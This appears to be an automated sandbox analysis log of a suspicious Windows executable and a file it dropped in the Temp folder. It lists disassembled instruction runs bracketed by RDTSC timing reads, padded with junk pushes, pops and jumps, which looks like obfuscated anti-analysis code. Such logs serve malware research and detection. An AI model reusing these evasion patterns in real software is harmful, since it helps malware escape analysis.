Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460383 second address: 54603AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F40B515FC02h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54604CC second address: 54604D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54604D2 second address: 54604D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54604D6 second address: 54604F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B477E795h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54604F6 second address: 54604FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54604FC second address: 5460500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460545 second address: 5460549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460549 second address: 546054F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546054F second address: 5460555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460555 second address: 5460559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460559 second address: 546055D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546055D second address: 5460618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F4124F3C6ADh 0x0000000e jmp 00007F40B477E78Ah 0x00000013 js 00007F40B477E7F4h 0x00000019 pushad 0x0000001a mov di, si 0x0000001d mov di, ax 0x00000020 popad 0x00000021 cmp dword ptr [ebp-14h], edi 0x00000024 pushad 0x00000025 call 00007F40B477E792h 0x0000002a mov esi, 0EB59D31h 0x0000002f pop ecx 0x00000030 pushfd 0x00000031 jmp 00007F40B477E797h 0x00000036 sbb cl, FFFFFF9Eh 0x00000039 jmp 00007F40B477E799h 0x0000003e popfd 0x0000003f popad 0x00000040 jne 00007F4124F3C64Ch 0x00000046 jmp 00007F40B477E78Eh 0x0000004b mov ebx, dword ptr [ebp+08h] 0x0000004e jmp 00007F40B477E790h 0x00000053 lea eax, dword ptr [ebp-2Ch] 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F40B477E797h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460618 second address: 5460645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F40B515FBFDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460645 second address: 546064B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546064B second address: 546064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546064F second address: 5460653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460653 second address: 5460661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460661 second address: 546068F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F40B477E791h 0x0000000a or ax, 45A6h 0x0000000f jmp 00007F40B477E791h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546068F second address: 5460695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460695 second address: 5460723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushfd 0x00000011 jmp 00007F40B477E791h 0x00000016 and al, 00000066h 0x00000019 jmp 00007F40B477E791h 0x0000001e popfd 0x0000001f popad 0x00000020 nop 0x00000021 jmp 00007F40B477E78Eh 0x00000026 push eax 0x00000027 jmp 00007F40B477E78Bh 0x0000002c nop 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F40B477E794h 0x00000034 xor eax, 7190AA68h 0x0000003a jmp 00007F40B477E78Bh 0x0000003f popfd 0x00000040 push eax 0x00000041 push edx 0x00000042 mov bl, ch 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460723 second address: 5460742 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 mov bx, C6BAh 0x0000000d popad 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F40B515FBFCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450EE0 second address: 5450EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450EE6 second address: 5450F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F40B515FC00h 0x00000009 xor eax, 697C23A8h 0x0000000f jmp 00007F40B515FBFBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450F0E second address: 5450F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [ebp-04h], 55534552h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F40B477E790h 0x00000017 sbb si, 9608h 0x0000001c jmp 00007F40B477E78Bh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450F8C second address: 5450FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450FA4 second address: 5460B8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a and bl, 00000001h 0x0000000d movzx eax, bl 0x00000010 lea esp, dword ptr [ebp-0Ch] 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 pop ebp 0x00000017 ret 0x00000018 add esp, 04h 0x0000001b jmp dword ptr [003CA41Ch+ebx*4] 0x00000022 push edi 0x00000023 call 00007F40B47A4187h 0x00000028 push ebp 0x00000029 push ebx 0x0000002a push edi 0x0000002b push esi 0x0000002c sub esp, 000001D0h 0x00000032 mov dword ptr [esp+000001B4h], 003CCB10h 0x0000003d mov dword ptr [esp+000001B0h], 000000D0h 0x00000048 mov dword ptr [esp], 00000000h 0x0000004f mov eax, dword ptr [003C81DCh] 0x00000054 call eax 0x00000056 mov edi, edi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460B8A second address: 5460B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460B8E second address: 5460BA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E792h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460BA4 second address: 5460BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F40B515FC06h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F40B515FBFEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460BDB second address: 5460C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 28CC28B4h 0x00000008 jmp 00007F40B477E78Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 call 00007F40B477E799h 0x0000001a pushfd 0x0000001b jmp 00007F40B477E790h 0x00000020 adc esi, 6496C8C8h 0x00000026 jmp 00007F40B477E78Bh 0x0000002b popfd 0x0000002c pop eax 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F40B477E792h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C4C second address: 5460C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C52 second address: 5460C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C56 second address: 5460C9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75C7459Ch], 05h 0x0000000f jmp 00007F40B515FC09h 0x00000014 je 00007F412590D977h 0x0000001a pushad 0x0000001b movzx esi, di 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F40B515FC01h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460C9D second address: 5460CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460CA3 second address: 5460CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460CA7 second address: 5460CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460E07 second address: 5460E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548068C second address: 5480690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480690 second address: 5480696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480696 second address: 54806EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 3121h 0x00000007 pushfd 0x00000008 jmp 00007F40B477E78Eh 0x0000000d xor eax, 227FAEB8h 0x00000013 jmp 00007F40B477E78Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jmp 00007F40B477E799h 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 call 00007F40B477E78Ah 0x0000002b pop ecx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54806EA second address: 5480781 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 479D8C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, 6292h 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov bl, B1h 0x00000013 pushfd 0x00000014 jmp 00007F40B515FC00h 0x00000019 adc al, FFFFFFA8h 0x0000001c jmp 00007F40B515FBFBh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 pushad 0x00000025 pushad 0x00000026 mov ax, C531h 0x0000002a pushfd 0x0000002b jmp 00007F40B515FBFEh 0x00000030 sub esi, 2D1FFD08h 0x00000036 jmp 00007F40B515FBFBh 0x0000003b popfd 0x0000003c popad 0x0000003d jmp 00007F40B515FC08h 0x00000042 popad 0x00000043 push eax 0x00000044 jmp 00007F40B515FBFBh 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F40B515FC00h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480781 second address: 5480785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480785 second address: 548078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548078B second address: 54807DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f pushfd 0x00000010 jmp 00007F40B477E78Ah 0x00000015 or ecx, 6915F428h 0x0000001b jmp 00007F40B477E78Bh 0x00000020 popfd 0x00000021 popad 0x00000022 test esi, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F40B477E795h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54807DA second address: 5480812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F41258ED7BEh 0x0000000f jmp 00007F40B515FBFEh 0x00000014 cmp dword ptr [75C7459Ch], 05h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, dl 0x00000020 push esi 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480812 second address: 548086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4124F243FCh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F40B477E794h 0x00000016 add si, E678h 0x0000001b jmp 00007F40B477E78Bh 0x00000020 popfd 0x00000021 mov ah, C9h 0x00000023 popad 0x00000024 push edx 0x00000025 pushad 0x00000026 mov eax, 0CFAA7FDh 0x0000002b push eax 0x0000002c movsx ebx, si 0x0000002f pop ecx 0x00000030 popad 0x00000031 mov dword ptr [esp], esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F40B477E78Ch 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548086F second address: 5480881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B515FBFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54808BB second address: 54808BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54808BF second address: 54808C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54808C5 second address: 54808E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E798h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54808E1 second address: 54808F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F40B515FBFAh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126E7B second address: 1126EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Ch 0x00000009 jmp 00007F40B477E798h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126EA5 second address: 1126EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126EAA second address: 1126EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126EB0 second address: 1126EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126EB6 second address: 1126EE0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F40B477E786h 0x00000008 jnc 00007F40B477E786h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F40B477E78Ch 0x0000001a jp 00007F40B477E786h 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007F40B477E786h 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126EE0 second address: 1126EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126EE6 second address: 1126F01 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F40B477E78Dh 0x0000000d jno 00007F40B477E786h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126F01 second address: 1126F0B instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B515FBF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1120E68 second address: 1120E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E799h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F40B477E786h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1120E90 second address: 1120E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1120E94 second address: 1120EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jo 00007F40B477E786h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1120EAB second address: 1120EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FC05h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1120EC8 second address: 1120EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F40B477E786h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1120EDB second address: 1120EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1125E38 second address: 1125E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E796h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1125E53 second address: 1125E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1125E58 second address: 1125E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F40B477E786h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1125E64 second address: 1125E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1125E6A second address: 1125E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126143 second address: 1126159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jne 00007F40B515FC1Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F40B515FBF6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11262DC second address: 11262E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 11262E1 second address: 11262E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126585 second address: 1126589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126589 second address: 112659E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F40B515FBFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 112659E second address: 11265AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F40B477E786h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126735 second address: 1126739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126739 second address: 1126751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jnc 00007F40B477E786h 0x00000011 jnl 00007F40B477E786h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126751 second address: 1126756 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe RDTSC instruction interceptor: First address: 1126756 second address: 112676D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E78Ah 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F40B477E786h 0x00000012 rdtsc
